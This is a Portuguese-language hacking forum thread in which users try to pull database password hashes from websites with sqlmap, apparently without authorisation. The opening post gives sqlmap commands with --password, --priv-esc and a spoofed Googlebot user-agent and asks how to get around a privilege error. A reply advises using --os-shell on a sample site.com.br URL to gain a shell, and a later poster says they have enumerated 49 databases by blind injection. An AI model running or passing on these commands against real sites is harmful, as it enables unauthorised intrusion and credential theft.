Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Problemas com privilégios no sqlmap

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Problemas com privilégios no sqlmap

    Estou tentando encontrar os passwords hashes de um banco de dados. Consegui os usuários facilmente, mas na hora de conseguir os passwords, usando o sqlmap, recebo o seguinte aviso:
    [CRITICAL] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database table).

    Queria saber se tem algum jeito de burlar isso...
    Já utilizei várias sintaxes de comando:
    ./sqlmap.py -u SITE -U USUARIO --password --priv-esc -o --threads 10 --hex --level=5 --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    ./sqlmap.py -u SITE -U USUARIO --password --level=5 --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    ./sqlmap.py -u SITE -U USUARIO --password -v 5 --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

    O último código me dá algumas informações, mas não sei interpretá-las muito bem... Quem souber, está aqui:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Similar Threads

  • Font Size
    #2
    Isso ta falando que vc na tem previlegio de leitura no banco de dados, o que eu sugiro e tenta pelo proprio sqlmap manda um shell.
    sqlmap.py " site.com.br/index.php?id=34 " -o --os-shell
    Se consegui vc pode acessar o bd por ela.

    Comment


    • Font Size
      #3
      shell pelo sqlmap

      Isso ta falando que vc na tem previlegio de leitura no banco de dados, o que eu sugiro e tenta pelo proprio sqlmap manda um shell.
      sqlmap.py " site.com.br/index.php?id=34 " -o --os-shell
      Se consegui vc pode acessar o bd por ela.

      Se ajudei pode agradecer ok ...

      Comment


      • Font Size
        #4
        O current user da DB não tem privilégios pra ver as passwords dos outros mano, só isso. Você não vai conseguir nada, nem com o "--os-shell" e nem com o "--sql-shell".

        Comment


        • Font Size
          #5
          no hashs

          Olá pessoal! Estou tendo este mesmo problema.

          No caso, listei 49 BD, consigo consultar tabelas e colunas, mas password nada.. e o ruim é que o método para injetar é technique = T, então consulta letra por letra de tabelas e colunas é ruim de mais..



          Alguma sugestão?

          Comment

          X
          Working...
          X